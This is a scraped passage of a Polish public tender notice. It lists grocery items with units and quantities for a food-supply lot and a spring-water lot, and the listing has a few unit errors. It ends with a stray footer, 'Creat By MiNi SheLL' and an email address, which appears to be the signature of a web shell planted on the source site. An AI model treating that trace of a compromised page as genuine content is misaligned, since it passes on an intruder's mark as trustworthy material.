DROŻDŻE ŚWIEŻE opakowanie 100-120g	szt	72
DŻEM  BEZ KONSERWANTÓW, 100% owoców  różne smaki: truskawkowy, morelowy, brzoskwiniowy, owoce leśne,czarna porzeczka, wsad owocowy.  opakowanie słoik 280 - 320g	szt.	60
GAŁKA MUSZKATAŁOWA, opakowanie 50-100g	szt.	10
GOŹDZIKI, przyprawa 15-20g	szt.	10
GROSZEK KONSERWOWY opakowanie puszka 400g  typu KRAKUS	szt.	30
HERBATA EKSPRESOWA CZARNA 100% TYPU SAGA, opakowanie 100 saszetek	szt.	15
HERBATA EKSPRESOWA CZARNA 100%, WYSOKOGATUNKOWA, TYPU EL GRAY, opakowanie 100 saszetek	szt.	2
HERBATA EKSPRESOWA MIĘTA, opakowanie 20-25 saszetek	szt	4
KAKAO CIEMNE EXTRA typu DeCo Morrena, opakowanie 80-100g	szt	85
KASZA GRYCZANA, prażona, opakowanie 400-1000g, 	kg	70
KASZA JAGLANA opakowanie350g	kg	15
KASZA JĘCZMIENNA biała/perłowa łamana średnia, opakowanie 400-1000g	kg	50
KASZA KUKURYDZIANA, , TYPU SANKO	kg	20
KASZA KUSKUS, opakowanie 900-1000g	szt.	20
KASZA MANNA , opakowanie 1000g	kg	70
KAWA ROZPUSZCZALNA ZBOŻOWA typu Inka, opakowanie 150-200g	szt.	20
KISIEL OWOCOWY, różne smaki, opakowanie 35-40g, wydajność z paczki min. 500ml	szt.	25
KONCENTRAT BURACZANY, syrop z buraka ćwikłowego, opakowanie butelka 350-400ml	szt.	5
KONCENTRAT POMIDOROWY opakowanie słoik 900g, pasteryzowany, zawartość ekstraktu 30%, bez konserwantów TYPU PUDLISZKI	szt.	86
KSYLITOL KRYSTALICZNY 250G, NATURALNA SUBSTANCJA SŁODZĄCA POZYSKIWANA Z KORY BRZOZY	szt.	5
KUKURYDZA  KONSERWOWA,opakowanie puszka 400-460g	szt.	45
KURKUMA, opakowanie torebka 10-15g	szt.	15
KWASEK CYTRYNOWY opakowanie 20-25g	szt.	30
LIŚĆ LAUROWYopakowanie 6-8g	szt.	50
MAJERANEK SUSZONY opakowanie 10-15g	szt.	80
MAJONEZ DEKORACYJNY TYPU WINIARY, min. zawartość żółtek 0,6%, bez konserwantów, opakowanie słoik 400-450g	szt.	40
MAKARON KOKARDKI TYPU LUBELLA NR 51, opakowanie 500g, wartość energetyczna w 100g suchego produktu min. 340 kcal, nie sklejający się	szt.	50
MAKARON KOLANKA typu LUBELLA NR 33, opakowanie 500g, wartośc energetyczna w 100g produktu min. 340kcal	szt.	50
MAKARON KRAJANKA TYPU LUBELLA NR 8, opakowanie 500g, wartość energetyczna w 100g suchego produktu min. 340 kcal, nie sklejający się	szt.	50
MAKARON MUSZELKI TYPU LUBELLA NR 26, opakowanie 500g, wartość energetyczna w 100g suchego produktu min. 340 kcal, nie sklejający się	szt.	50
MAKARON NITKI TYPU LUBELLA NR 49, opakowanie 500g, wartość energetyczna w 100g suchego produktu min. 340 kcal, nie sklejający się	szt.	50
MAKARON PEŁNOZIARNISTY KOKARDKI TYPU LUBELLA, opakowanie 400g	kg	10
MAKARON PEŁNOZIARNISTY PENNE TYPU LUBELLA, opakowanie 400g	szt.	10
MAKARON PEŁNOZIARNISTY ŚWIDRY TYPU LUBELLA, opakowanie 400g	szt.	10
MAKARON PENNE RIGATE TYPU LUBELLA NR 17, opakowanie 500g, wartość energetyczna w 100g suchego produktu min. 330 kcal, nie sklejający się	szt.	10
Herbata owocowa ekspresowa różne smaki po 20 szt w opakowaniu	op	365
MAKARON ŚWIDERKI PEŁNOZIARNISTY TYPU LUBELLA NR 19, opakowanie 500g, wartość energetyczna w 100g suchego produktu min. 340 kcal, nie sklejający się	litr	10
MAKARON WSTĄŻKA KARBOWANA TYPU LUBELLA NR 13, opakowanie 500g, wartość energetyczna w 100g suchego produktu min. 300 kcal, nie sklejający się	szt.	10
MĄKA PSZENNA SZYMANOWSKA TYP 480, opakowanie papierowe 1000g	szt.	440
MĄKA ZIEMNIACZANA, opakowanie 1000g	szt.	40
MIGDAŁY ŁUSKANE, opakowanie 100g	szt.	180
MIÓD NATURALNY PSZCZELI, wielokwiatowy nektarowy polski, opakowanie słoik , wartość energetyczna w 100g produktu min. 300 kcal	kg	60
MORELE SUSZONE, opakowanie 100g	szt.	180
MUSLI LO BEZ DODATKU CUKRU Z OWOCAMI, 300G	szt.	16
MUSZTARDA TYPU SAREPSKA, opakowanie szklane 200-260g	szt.	25
OCET SPIRYTUSOWY, 500ml  	szt	10
OCET winny lub jabłkowy, 300-500ml	szt.	10
OLEJ RZEPAKOWY (z pierwszego tłoczenia, opakowanie 1-litr	l	200
OLIWA Z OLIWEK (z pierwszego tłoczenia, opakowanie 1000mll)	szt.	15
OLIWKI-opakowanie słoik  500l	szt.	5
OREGANO opakowanie 15-20g	szt.	15
orzechy włoskie łuskane- 100g	szt	180
pestki z dyni- 100g	szt	180
pestki ze słonecznika - 100g	szt	180
susz jagłkowy naturalny typu chripsy- do 20g	szt.	180
ORZECHY LASKOWE 100-200g	szt	180
PAPRYKA MIELONA OSTRA, kolor intensywnie czerwony, opakowanie 20-25g	szt.	10
PAPRYKA MIELONA SŁODKA, kolor intensywnie czerwony, opakowanie 20-25g 	szt.	30
PIEPRZ CZARNY MIELONY, opakowanie 20-25g	szt	130
PIEPRZ ZIOŁOWY, opakowanie 20-25g	szt.	70
PŁATKI ryżowe 	szt.	80
Płatki kukurydziane 250 g	szt	132
PŁATKI OWSIANE GÓRSKIE  WYSOKA ZAWARTOŚĆ BŁONNIKA (6,9g/100g produktu).	kg	10
PRZYPRAWA DO kurczaka typu kamis opakowanie 15-20g	szt	100
PRZYPRAWA W PŁYNIE TYPU MAGI, opakowanie butelka 1000ml	szt.	30
PRZYPRAWA WARZYWNA DO POTRAW -NATUR, typu Vegeta, opakowanie 150-300g, zawierająca min. 30% suszonych warzyw takich jak marchew, cebula, ziemniaki, pasternak, seler, natka pietruszki, bez żadnych sztucznych dodatków.	szt.	10
RODZYNKI SUŁTAŃSKIE, opakowanie 250-300g	szt.	180
Lubczyk suszony duże opakowanie 0,5 	kg	1
RYŻ NATURALNY,biały DŁUGOZIARNISTY SYPKI, , wartość energetyczna w 100g produktu min. 353 kcal	kg	105
Galaretka owocowa bez konserwantów, różne smaki	szt	220
SÓL JODOWO -POTASOWA	kg	100
TYMIANEK, opakowanie 10-15g	op	15
WAFLE KUKURYDZIANE NATURALNE TYPU KUPIEC-opakowanie 10 szt	op	16
WAFLE RYŻOWE-Z PEŁNEGO ZIARNA RYŻU BRĄZOWEGO, NATURALNE, 110g	szt	200
sezamki- 50-60g	szt	100
chałwa waniliowa 100g	szt	100
ketchup łagodny , bez konserwantów, ulepszaczy z zawartościa pomidorów min 80%opakowanie 200-250 g	szt	80
jajko z niespodzianką czekolada deserowa	szt	100
Mikołaj czekoladowy- czekolada deserowa 100g	szt	100
Zajączek czekoladowy 100g z czekolady deserowej	szt	100
Pieprz ziarnisty 20-25g	szt	50
soda oczyszczona 	szt	10
Proszek do pieczenia na 1 kg maki	szt	150
ZIOŁA PROWANSALSKIE, opakowanie torebka 10-15g	szt	15
Imbir sypki 	kg	0,3
Otręby owsiane	kg	10
Wiórki kokosowe	kg	3
Daktyle suszone 	kg	2
ZIELE ANGIELSKIE, opakowanie torebka 10-15g	szt	15.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Woda źródlana.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> WODA ŹRÓDLANA NATURALNA, niskozmineralizowana, niegazowana, butle 18,9-20 litrów, hermetycznie zamykane do każdej butli kubki plastikowe 100szt., cena kubków wliczone w cenę wody	szt.	120.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.98.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com